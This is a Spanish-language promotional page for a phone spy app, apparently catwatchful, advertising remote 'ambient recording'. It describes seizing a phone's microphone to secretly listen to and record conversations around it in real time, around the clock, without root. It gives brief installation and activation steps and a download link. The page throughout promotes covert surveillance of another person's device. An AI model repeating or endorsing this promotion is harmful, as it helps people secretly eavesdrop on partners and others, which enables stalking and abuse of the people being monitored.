Saltar al contenido

Grabacion de entorno

febrero 28, 2018
grabacion de entorno

Grabacion de entorno

 

Que significa la Grabacion de entorno?

Significa que usted podrá apoderarse del micrófono del celular y escuchar todo lo que sucede alrededor, incluso si el móvil se encuentra en reposo.  Podrá espiar las conversaciones y escuchar todo lo que ocurre en una habitación, por ejemplo. Todo esto de forma remota y en tiempo real.  La grabación de entorno es de vital importancia en cualquier herramienta espía, ya que aun si el celular esta en el bolsillo o en una cartera, se podrá escuchar todo el sonido ambiente.

 

Que debo hacer para grabar el entorno y escuchar?

Debes instalar la aplicación, seguir los pasos de activación. Cuando todo este listo, deberás acceder a tu cuenta de usuario y con un simple botón podrás comenzar a grabar el entorno en tiempo real. Escucha todo lo que sucede alrededor y guarda esas grabaciones para escucharlas luego.  Esta herramienta nos da la opción de almacenar las grabaciones en orden cronológico.

 

Cuales son las limitaciones en la grabación del entorno?

Por ser una característica en tiempo real, se necesita que el móvil disponga de conexión a Internet. Apenas el celular tenga Internet, ya podrás comenzar a espiar el micrófono y escucharlo todo.  No hay otras limitaciones, ya que puedes grabar el entorno las 24 horas del día y en tiempo real.

 

Con que dispositivos es compatible esta característica?

La grabación de entorno funciona en cualquier dispositivo Android 4 o superior.  Es soportada por la mayoría de dispositivos, así que no hay de que preocuparse. Tampoco es necesario que el dispositivo este root, podrás usarla igual. Solo debes instalar la herramienta espiar celular para comenzar a grabar el entorno.

[ia_button id=”button_56″ size=”small” solid=”1″ link=”https://www.catwatchful.es/descargar/” icon=”” arrow=”1″ target=”” color=”#” css_animation=”” animation_delay=””]Descargar aplicación [/ia_button]

 

En este vídeo se muestra una guía de instalación de la aplicación para espiar el celular. Con esta herramienta podrás comenzar a grabar el entorno en muy pocos pasos.